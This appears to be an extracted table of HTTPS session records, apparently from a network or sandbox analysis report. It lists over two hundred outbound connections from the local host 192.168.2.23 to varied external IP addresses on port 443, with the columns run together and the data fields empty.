                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20633192.168.2.2336110169.167.35.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20634192.168.2.235126025.138.59.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20635192.168.2.2355074184.112.144.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20636192.168.2.2357010141.225.35.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20637192.168.2.233843637.79.94.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20638192.168.2.2347974170.185.25.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20639192.168.2.2353820183.192.159.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20640192.168.2.233467299.42.65.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20641192.168.2.2338598220.197.216.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20642192.168.2.2341792207.47.112.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20643192.168.2.235289214.148.144.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20644192.168.2.2334532170.99.10.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20645192.168.2.2338498154.166.161.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20646192.168.2.235838090.86.247.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20647192.168.2.233626443.20.231.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20648192.168.2.2354044180.158.165.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20649192.168.2.234882838.193.5.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20650192.168.2.2359910171.32.55.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20651192.168.2.235055690.225.121.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20652192.168.2.2348054101.68.113.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20653192.168.2.2354030143.20.254.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20654192.168.2.23593384.95.117.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20655192.168.2.2341260113.143.23.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20656192.168.2.2345228212.122.19.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20657192.168.2.235920459.101.187.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20658192.168.2.2339162180.14.147.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20659192.168.2.2359856187.128.148.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20660192.168.2.2334438203.230.75.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20661192.168.2.2352526108.215.197.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20662192.168.2.234604038.150.57.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20663192.168.2.234412019.232.71.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20664192.168.2.234003665.99.165.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20665192.168.2.235613035.155.24.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20666192.168.2.2358220169.174.216.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20667192.168.2.2358578198.222.181.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20668192.168.2.2360618136.215.47.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20669192.168.2.233882054.209.56.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20670192.168.2.233782218.115.175.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20671192.168.2.2341140119.164.217.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20672192.168.2.235040878.162.28.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20673192.168.2.2352626138.87.208.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20674192.168.2.2355826200.118.223.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20675192.168.2.234954485.240.233.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20676192.168.2.233856292.13.222.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20677192.168.2.2344152136.23.170.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20678192.168.2.236001098.85.158.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20679192.168.2.2336052120.100.67.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20680192.168.2.2339708212.239.0.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20681192.168.2.2347180136.144.105.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20682192.168.2.234777275.126.135.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20683192.168.2.2344368142.36.99.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20684192.168.2.2342152107.167.81.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20685192.168.2.233976068.54.220.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20686192.168.2.2350966131.4.75.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20687192.168.2.2343238211.100.153.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20688192.168.2.2338592204.254.224.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20689192.168.2.2345832205.131.18.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20690192.168.2.234049875.245.99.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20691192.168.2.2351330144.37.12.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20692192.168.2.23526561.136.164.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20693192.168.2.2353818131.183.143.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20694192.168.2.2351924187.14.186.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20695192.168.2.2355494131.159.10.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20696192.168.2.2337986112.167.251.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20697192.168.2.2335456176.66.223.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20698192.168.2.23459868.98.216.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20699192.168.2.2346928133.72.47.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20700192.168.2.235458824.82.43.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20701192.168.2.2344852118.152.108.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20702192.168.2.2343534144.38.188.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20703192.168.2.2355360132.194.237.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20704192.168.2.2354600169.230.133.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20705192.168.2.2350334112.160.193.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20706192.168.2.2354304138.240.21.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20707192.168.2.2345502204.25.48.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20708192.168.2.2354880177.75.62.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20709192.168.2.2349742136.229.222.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20710192.168.2.2343778154.183.115.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20711192.168.2.234359062.137.230.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20712192.168.2.2340842180.113.225.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20713192.168.2.2345618176.195.32.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20714192.168.2.2340458173.203.37.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20715192.168.2.23329229.9.115.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20716192.168.2.2342090166.244.22.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20717192.168.2.2351210201.128.99.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20718192.168.2.2336038110.160.246.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20719192.168.2.233741251.168.240.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20720192.168.2.234745458.151.22.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20721192.168.2.2341914218.163.48.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20722192.168.2.2342452190.201.22.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20723192.168.2.2338984160.108.64.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20724192.168.2.2348770196.150.105.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20725192.168.2.2333828196.224.95.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20726192.168.2.2338692172.83.154.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20727192.168.2.236039480.251.177.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20728192.168.2.2355442113.172.0.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20729192.168.2.234425843.160.192.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20730192.168.2.234520624.18.224.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20731192.168.2.2343212132.31.144.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20732192.168.2.2344118119.136.208.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20733192.168.2.2352964211.255.206.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20734192.168.2.2347270163.5.155.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20735192.168.2.234369453.25.39.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20736192.168.2.2354304171.106.71.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20737192.168.2.23593085.128.72.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20738192.168.2.2346174210.76.168.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20739192.168.2.2344688205.181.185.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20740192.168.2.2335498170.164.183.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20741192.168.2.2336660118.88.209.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20742192.168.2.2341300110.52.154.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20743192.168.2.233665452.89.135.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20744192.168.2.234432040.35.227.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20745192.168.2.2342168205.117.249.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20746192.168.2.234426273.136.28.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20747192.168.2.2340408207.77.109.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20748192.168.2.2335660142.248.98.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20749192.168.2.2338990187.213.147.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20750192.168.2.2349434143.207.126.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20751192.168.2.234759253.128.64.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20752192.168.2.234085895.144.101.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20753192.168.2.235258669.174.221.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20754192.168.2.2341820124.153.72.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20755192.168.2.235711680.171.211.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20756192.168.2.234658058.36.99.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20757192.168.2.2341838106.98.14.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20758192.168.2.2343576152.178.64.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20759192.168.2.2355340115.66.42.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20760192.168.2.233333643.149.226.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20761192.168.2.235810464.171.92.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20762192.168.2.234692080.212.126.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20763192.168.2.235320668.215.27.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20764192.168.2.2349358190.195.153.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20765192.168.2.2350990113.139.212.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20766192.168.2.2354554122.157.99.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20767192.168.2.2347428164.177.15.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20768192.168.2.2349570219.232.65.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20769192.168.2.2333638177.168.183.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20770192.168.2.2359128144.56.57.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20771192.168.2.234598435.32.166.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20772192.168.2.2339474154.117.98.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20773192.168.2.2352202201.28.91.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20774192.168.2.2356316204.217.131.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20775192.168.2.2347664105.199.145.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20776192.168.2.2358582192.217.232.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20777192.168.2.2359318134.236.41.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20778192.168.2.2354228159.254.196.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20779192.168.2.235118475.4.245.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20780192.168.2.234048266.149.150.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20781192.168.2.236027461.34.223.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20782192.168.2.2338632156.117.211.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20783192.168.2.235743859.250.121.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20784192.168.2.2341754108.149.176.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20785192.168.2.235543820.109.61.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20786192.168.2.2351898117.246.44.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20787192.168.2.2343528155.197.232.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20788192.168.2.234495842.180.145.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20789192.168.2.2342616106.121.145.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20790192.168.2.233813295.65.155.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20791192.168.2.234977092.240.176.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20792192.168.2.2354618211.160.103.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20793192.168.2.235182623.143.68.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20794192.168.2.2352140190.192.9.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20795192.168.2.233963227.14.250.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20796192.168.2.234676295.154.51.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20797192.168.2.2351888191.162.224.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20798192.168.2.2341834111.64.71.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20799192.168.2.2360752111.125.137.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20800192.168.2.2344762132.182.198.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20801192.168.2.23524489.195.66.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20802192.168.2.234932690.17.100.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20803192.168.2.2347310103.122.111.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20804192.168.2.234768462.178.79.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20805192.168.2.2346546191.171.68.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20806192.168.2.234382276.22.126.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20807192.168.2.2335068154.186.254.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20808192.168.2.2358260170.86.236.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20809192.168.2.234692417.31.86.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20810192.168.2.235755496.94.30.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20811192.168.2.233617823.190.225.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20812192.168.2.235326267.67.50.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20813192.168.2.2353834179.177.28.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20814192.168.2.234761099.2.8.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20815192.168.2.2356662109.79.110.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20816192.168.2.235890847.140.49.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20817192.168.2.235968872.126.125.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20818192.168.2.2341172120.72.162.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20819192.168.2.2336030173.5.136.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20820192.168.2.2338828201.134.208.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20821192.168.2.233330697.229.8.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20822192.168.2.234716019.165.67.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20823192.168.2.2339130182.232.49.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20824192.168.2.2346926152.163.191.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20825192.168.2.2336154210.51.134.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20826192.168.2.235796870.141.44.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20827192.168.2.2360356188.227.42.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20828192.168.2.2347316108.215.247.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20829192.168.2.2338514105.224.55.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20830192.168.2.2337542137.18.61.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20831192.168.2.2347028154.229.93.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20832192.168.2.234337665.97.94.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20833192.168.2.234603246.227.115.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20834192.168.2.233845495.57.226.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20835192.168.2.23473502.2.162.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20836192.168.2.2332816139.192.146.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20837192.168.2.2346000106.159.197.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20838192.168.2.234958217.149.83.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20839192.168.2.2335078173.217.189.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20840192.168.2.2355340133.192.56.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20841192.168.2.2351348185.224.133.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20842192.168.2.2334586150.232.197.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20843192.168.2.23426245.213.27.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20844192.168.2.2347032206.109.52.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20845192.168.2.233726688.221.212.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20846192.168.2.235895824.98.243.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20847192.168.2.2346044190.206.204.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20848192.168.2.235187699.253.166.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20849192.168.2.234924476.73.253.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20850192.168.2.2356870116.159.108.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20851192.168.2.2354530169.223.197.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20852192.168.2.234466261.223.47.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20853192.168.2.2360016159.32.231.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
